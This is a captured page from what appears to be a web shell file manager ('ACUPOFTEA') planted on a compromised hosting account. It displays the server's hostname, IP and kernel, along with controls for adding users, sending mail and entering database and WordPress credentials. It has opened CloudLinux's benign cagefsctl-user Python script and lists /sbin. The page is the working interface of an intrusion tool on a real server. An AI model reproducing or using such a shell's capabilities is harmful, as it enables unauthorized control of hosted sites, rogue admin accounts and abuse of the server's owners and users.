System
:
Linux premium225.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software
:
LiteSpeed
Server
:
66.29.146.24
Domains
:
Cant read /etc/named.conf
Permission
:
[
dr-xr-xr-x
]
:
/
sbin
/
216.73.217.0
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for verdozaglobal.com made by tabagkayu.
Folder Name
File Name
File Content
File
cagefsctl-user
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENCE.TXT # """ User-level CLI utility for managing website isolation. This script runs via proxyexec with root privileges but operates on behalf of the calling user. It validates that the user only manages domains they own. Commands: site-isolation-enable --domain DOMAIN[,DOMAIN2,...] Enable site isolation for domain(s) site-isolation-disable --domain DOMAIN[,DOMAIN2,...] Disable site isolation for domain(s) site-isolation-list List domains with site isolation enabled All commands output JSON: Success: {"result": "success", "enabled_sites": ["domain1", "domain2"]} Error: {"result": "ERROR_CODE"} """ import argparse import json import logging import os import sys import pwd from clcommon.cpapi import domain_owner, userdomains from clcommon.cpapi.cpapiexceptions import NoDomain from clcagefslib.cli import ( call_via_proxyexec, in_cagefs, is_running_via_proxyexec, ) from clcagefslib.domain import ( enable_website_isolation, disable_website_isolation, get_websites_with_enabled_isolation, is_website_isolation_allowed_server_wide, is_website_isolation_allowed_for_user, ) from clcagefslib.fs import user_exists # Logging configuration LOG_FILE = "/var/log/cloudlinux/cagefsctl-user.log" # Proxyexec alias for all cagefsctl-user commands PROXYEXEC_ALIAS = "CAGEFSCTL_USER" def setup_logger(): """ Set up logging to file only (no console output). Returns: logging.Logger: Configured logger instance """ logger = logging.getLogger("cagefsctl-user") logger.setLevel(logging.INFO) # Disable propagation to root logger to prevent console output logger.propagate = False try: fh = logging.FileHandler(LOG_FILE) fh.setFormatter(logging.Formatter( "[%(levelname)s | %(asctime)s]: %(message)s" )) logger.addHandler(fh) except (IOError, OSError): # Cannot write to log file, continue without file logging pass return logger logger = setup_logger() class ErrorCodes: """Error codes for JSON responses.""" SITE_ISOLATION_NOT_ALLOWED = "Site isolation feature is not allowed" DOMAIN_NOT_FOUND = "Specified domain is not found" USER_NOT_FOUND = "User not found" INTERNAL_ERROR = "Internal error" MISSING_DOMAIN = "Domain is not specified" ROOT_NOT_ALLOWED = "Utility cannot be run as root" def get_calling_user(): """ Get the username of the calling user from proxyexec environment. When running via proxyexec, PROXYEXEC_UID contains the original user's UID. Falls back to current process UID if not set. Returns: str: Username of the calling user None: If user cannot be determined """ proxyexec_uid = os.environ.get("PROXYEXEC_UID") if not proxyexec_uid: return None try: uid = int(proxyexec_uid) pw = pwd.getpwuid(uid) return pw.pw_name except (ValueError, KeyError): return None def json_response(result, enabled_sites=None, message=None): """ Create a JSON response dictionary. Args: result: "success" or error code enabled_sites: Optional list of enabled sites (for success responses) message: Optional error message with additional details Returns: dict: Response dictionary """ response = {"result": result} if enabled_sites is not None: response["enabled_sites"] = enabled_sites if message is not None: response["message"] = message return response def output_json(response): """Print JSON response to stdout.""" print(json.dumps(response)) def validate_domain_ownership(username, domain): """ Validate that a domain belongs to the specified user. Args: username: The username to check ownership for domain: The domain to validate Returns: tuple: (is_valid, error_code) is_valid: True if domain belongs to user error_code: Error code if validation fails, None otherwise """ try: owner = domain_owner(domain) if owner is None: # Fallback: domain_owner() may not resolve subdomains # on some panels (e.g. DirectAdmin). Check via userdomains(). user_domains = [d for d, _ in userdomains(username)] if domain in user_domains: return True, None return False, ErrorCodes.DOMAIN_NOT_FOUND if owner != username: return False, ErrorCodes.DOMAIN_NOT_FOUND return True, None except NoDomain: return False, ErrorCodes.DOMAIN_NOT_FOUND except Exception: return False, ErrorCodes.INTERNAL_ERROR def get_validated_user(): """ Get the calling user and validate they exist. Returns: tuple: (username, error_code) username: The validated username, or None if validation failed error_code: Error code if validation failed, or None if successful """ username = get_calling_user() if not username: logger.error("User not found") return None, ErrorCodes.USER_NOT_FOUND if not user_exists(username): logger.error("User %s does not exist", username) return None, ErrorCodes.USER_NOT_FOUND return username, None def validate_domain_for_user(username, domain): """ Validate domain argument and ownership for a user. Args: username: The username to check ownership for domain: The domain to validate Returns: tuple: (is_valid, error_code) is_valid: True if domain is valid and belongs to user error_code: Error code if validation failed, None otherwise """ if not domain: logger.error("Missing domain argument") return False, ErrorCodes.MISSING_DOMAIN is_valid, error_code = validate_domain_ownership(username, domain) if not is_valid: logger.error("Domain validation failed: user=%s, domain=%s, error=%s", username, domain, error_code) return False, error_code return True, None def parse_domains(domain_arg): """ Parse comma-separated domain argument into a list of domains. Args: domain_arg: Comma-separated domain string (e.g., "domain1.com,domain2.com") Returns: list: List of domain names, with whitespace stripped """ if not domain_arg: return [] return [d.strip() for d in domain_arg.split(",") if d.strip()] def cmd_site_isolation_enable(args): """Handle site-isolation-enable command.""" domains = parse_domains(args.domain) logger.info("site-isolation-enable called: domains=%s", domains) if not domains: logger.error("No domains specified") output_json(json_response(ErrorCodes.MISSING_DOMAIN)) return 1 username, error = get_validated_user() if error: output_json(json_response(error)) return 1 if not is_website_isolation_allowed_server_wide(): logger.error("Site isolation not allowed server-wide") output_json(json_response(ErrorCodes.SITE_ISOLATION_NOT_ALLOWED)) return 1 if not is_website_isolation_allowed_for_user(username): logger.error("Site isolation not allowed for user %s", username) output_json(json_response(ErrorCodes.SITE_ISOLATION_NOT_ALLOWED)) return 1 # Validate all domains first for domain in domains: is_valid, error = validate_domain_for_user(username, domain) if not is_valid: output_json(json_response(error)) return 1 try: for domain in domains: enable_website_isolation(username, domain) enabled_sites = get_websites_with_enabled_isolation(username) logger.info("Site isolation enabled: user=%s, domains=%s, enabled_sites=%s", username, domains, enabled_sites) output_json(json_response("success", enabled_sites)) return 0 except Exception as e: logger.exception("Failed to enable site isolation: user=%s, domains=%s, error=%s", username, domains, e) output_json(json_response(ErrorCodes.INTERNAL_ERROR, message=str(e))) return 1 def cmd_site_isolation_disable(args): """Handle site-isolation-disable command.""" domains = parse_domains(args.domain) logger.info("site-isolation-disable called: domains=%s", domains) if not domains: logger.error("No domains specified") output_json(json_response(ErrorCodes.MISSING_DOMAIN)) return 1 username, error = get_validated_user() if error: output_json(json_response(error)) return 1 # Validate all domains first for domain in domains: is_valid, error = validate_domain_for_user(username, domain) if not is_valid: output_json(json_response(error)) return 1 try: for domain in domains: disable_website_isolation(username, domain) enabled_sites = get_websites_with_enabled_isolation(username) logger.info("Site isolation disabled: user=%s, domains=%s, enabled_sites=%s", username, domains, enabled_sites) output_json(json_response("success", enabled_sites)) return 0 except Exception as e: logger.exception("Failed to disable site isolation: user=%s, domains=%s, error=%s", username, domains, e) output_json(json_response(ErrorCodes.INTERNAL_ERROR, message=str(e))) return 1 def cmd_site_isolation_list(args): """Handle site-isolation-list command.""" logger.info("site-isolation-list called") username, error = get_validated_user() if error: output_json(json_response(error)) return 1 try: enabled_sites = get_websites_with_enabled_isolation(username) logger.info("Site isolation list: user=%s, enabled_sites=%s", username, enabled_sites) output_json(json_response("success", enabled_sites)) return 0 except Exception as e: logger.exception("Failed to list site isolation: user=%s, error=%s", username, e) output_json(json_response(ErrorCodes.INTERNAL_ERROR, message=str(e))) return 1 def _wrap_deprecated(func, old_name, new_name): """Return a wrapper that prints a deprecation warning then delegates.""" def wrapper(args): print(f"WARNING: {old_name} is deprecated, use {new_name}", file=sys.stderr) return func(args) return wrapper def create_parser(): """Create argument parser for cagefsctl-user.""" parser = argparse.ArgumentParser( prog="cagefsctl-user", description="User-level CLI utility for managing CloudLinux Isolates.", ) subparsers = parser.add_subparsers( title="commands", dest="command", help="Available commands", ) # isolates-enable command (primary) enable_parser = subparsers.add_parser( "isolates-enable", help="Enable isolation for domain(s)", ) enable_parser.add_argument( "--domain", required=True, help="Domain name(s) to enable isolation for (comma-separated)", ) enable_parser.set_defaults(func=cmd_site_isolation_enable) # isolates-disable command (primary) disable_parser = subparsers.add_parser( "isolates-disable", help="Disable isolation for domain(s)", ) disable_parser.add_argument( "--domain", required=True, help="Domain name(s) to disable isolation for (comma-separated)", ) disable_parser.set_defaults(func=cmd_site_isolation_disable) # isolates-list command (primary) list_parser = subparsers.add_parser( "isolates-list", help="List domains with isolation enabled", ) list_parser.set_defaults(func=cmd_site_isolation_list) # Deprecated aliases (backward compatible, print warning) dep_enable = subparsers.add_parser( "site-isolation-enable", help="(deprecated, use isolates-enable)", ) dep_enable.add_argument("--domain", required=True, help=argparse.SUPPRESS) dep_enable.set_defaults(func=_wrap_deprecated( cmd_site_isolation_enable, "site-isolation-enable", "isolates-enable")) dep_disable = subparsers.add_parser( "site-isolation-disable", help="(deprecated, use isolates-disable)", ) dep_disable.add_argument("--domain", required=True, help=argparse.SUPPRESS) dep_disable.set_defaults(func=_wrap_deprecated( cmd_site_isolation_disable, "site-isolation-disable", "isolates-disable")) dep_list = subparsers.add_parser( "site-isolation-list", help="(deprecated, use isolates-list)", ) dep_list.set_defaults(func=_wrap_deprecated( cmd_site_isolation_list, "site-isolation-list", "isolates-list")) return parser def main(argv=None): """Main entry point.""" parser = create_parser() args = parser.parse_args(argv) # Guard: do not allow running as root unless via proxyexec # When running via proxyexec, PROXYEXEC_UID is set if os.getuid() == 0 and not is_running_via_proxyexec(): logger.error("Direct root invocation not allowed") output_json(json_response(ErrorCodes.ROOT_NOT_ALLOWED)) return 1 # If running as user (not root via proxyexec) if os.getuid() != 0: if not in_cagefs(): print("This utility is only available inside CageFS.\n" "Please run it via: cagefs_enter cagefsctl-user <command>", file=sys.stderr) return 1 # Inside CageFS - call via proxyexec to get root privileges if not args.command: parser.print_help() return 1 # Build args list for proxyexec args_list = sys.argv[1:] # Pass all original args result = call_via_proxyexec(PROXYEXEC_ALIAS, args_list) if result is None: output_json(json_response( ErrorCodes.INTERNAL_ERROR, message="Failed to execute via proxyexec" )) return 1 return result # Running as root via proxyexec - execute the command if not hasattr(args, "func"): parser.print_help() return 1 return args.func(args) if __name__ == "__main__": sys.exit(main())
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
dr-xr-xr-x
2026-06-09 08:36:24
..
DIR
-
drwxr-xr-x
2026-06-06 08:00:07
cagefs_enter_site
text/x-script.python
1.83 KB
-rwxr-xr-x
2026-05-18 01:29:04
cagefsctl-user
text/x-script.python
14.41 KB
-rwxr-xr-x
2026-05-18 01:29:04
chroot
application/x-pie-executable
41.45 KB
-rwxr-xr-x
2026-03-24 01:05:31
cloudlinux-selector
text/x-script.python
654 B
-rwxr-xr-x
2026-05-12 10:09:39
consoletype
application/x-pie-executable
11.88 KB
-rwxr-xr-x
2025-11-10 10:42:43
cracklib-check
application/x-pie-executable
13.05 KB
-rwxr-xr-x
2019-10-12 12:47:15
cracklib-format
text/x-shellscript
251 B
-rwxr-xr-x
2019-10-12 12:47:14
cracklib-packer
application/x-pie-executable
13.05 KB
-rwxr-xr-x
2019-10-12 12:47:15
cracklib-unpacker
application/x-pie-executable
9.03 KB
-rwxr-xr-x
2019-10-12 12:47:15
create-cracklib-dict
text/x-shellscript
990 B
-rwxr-xr-x
2019-10-12 12:47:14
cxs
text/x-shellscript
1.25 KB
-rwxr-xr-x
2025-07-31 08:23:46
ddns-confgen
application/x-pie-executable
20.46 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-checkds
text/x-script.python
936 B
-rwxr-xr-x
2026-06-08 03:38:03
dnssec-coverage
text/x-script.python
938 B
-rwxr-xr-x
2026-06-08 03:38:03
dnssec-dsfromkey
application/x-pie-executable
60.84 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-importkey
application/x-pie-executable
60.84 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-keyfromlabel
application/x-pie-executable
64.75 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-keygen
application/x-pie-executable
72.84 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-keymgr
text/x-script.python
934 B
-rwxr-xr-x
2026-06-08 03:38:03
dnssec-revoke
application/x-pie-executable
56.74 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-settime
application/x-pie-executable
60.84 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-signzone
application/x-pie-executable
117.2 KB
-rwxr-xr-x
2026-06-08 03:38:10
dnssec-verify
application/x-pie-executable
52.84 KB
-rwxr-xr-x
2026-06-08 03:38:10
exim
text/x-shellscript
1.25 KB
-rwxr-xr-x
2026-05-29 07:00:38
faillock
application/x-pie-executable
20.52 KB
-rwxr-xr-x
2025-12-17 06:54:08
genrandom
application/x-pie-executable
12.38 KB
-rwxr-xr-x
2026-06-08 03:38:10
ip
application/x-pie-executable
693.3 KB
-rwxr-xr-x
2024-05-23 08:36:03
isc-hmac-fixup
application/x-pie-executable
11.85 KB
-rwxr-xr-x
2026-06-08 03:38:10
isolatectl
text/x-script.python
9.06 KB
-rwxr-xr-x
2026-05-20 05:27:14
ldconfig
application/x-pie-executable
986.13 KB
-rwxr-xr-x
2026-05-26 09:39:13
lvdctl
text/plain
683 B
-rwxr-xr-x
2026-05-20 05:27:14
mkhomedir_helper
application/x-pie-executable
24.44 KB
-rwxr-xr-x
2025-12-17 06:54:08
named-checkzone
application/x-pie-executable
36.63 KB
-rwxr-xr-x
2026-06-08 03:38:10
named-compilezone
application/x-pie-executable
36.63 KB
-rwxr-xr-x
2026-06-08 03:38:10
nsec3hash
application/x-pie-executable
12.29 KB
-rwxr-xr-x
2026-06-08 03:38:10
pam_console_apply
application/x-pie-executable
45.2 KB
-rwxr-xr-x
2025-12-17 06:54:08
pam_timestamp_check
application/x-pie-executable
11.87 KB
-rwxr-xr-x
2025-12-17 06:54:08
pluginviewer
application/x-pie-executable
20.57 KB
-rwxr-xr-x
2022-02-23 08:13:56
proxyexec
application/x-executable
21.17 KB
-r-xr-xr-x
2020-09-02 07:49:11
pwhistory_helper
application/x-pie-executable
20.44 KB
-rwxr-xr-x
2025-12-17 06:54:08
saslauthd
application/x-pie-executable
94.42 KB
-rwxr-xr-x
2022-02-23 08:13:56
sasldblistusers2
application/x-pie-executable
20.77 KB
-rwxr-xr-x
2022-02-23 08:13:56
saslpasswd2
application/x-pie-executable
16.42 KB
-rwxr-xr-x
2022-02-23 08:13:56
sendmail
text/x-shellscript
1.26 KB
-rwxr-xr-x
2026-05-29 07:00:38
testsaslauthd
application/x-pie-executable
16.66 KB
-rwxr-xr-x
2022-02-23 08:13:56
tmpwatch
application/x-pie-executable
35.47 KB
-rwxr-xr-x
2019-10-12 11:32:29
tsig-keygen
application/x-pie-executable
20.46 KB
-rwxr-xr-x
2026-06-08 03:38:10
unix_chkpwd
application/x-pie-executable
36.86 KB
-rwxr-xr-x
2025-12-17 06:54:08
unix_update
36.86 KB
-rwx------
2025-12-17 06:54:08
~ ACUPOFTEA - verdozaglobal.com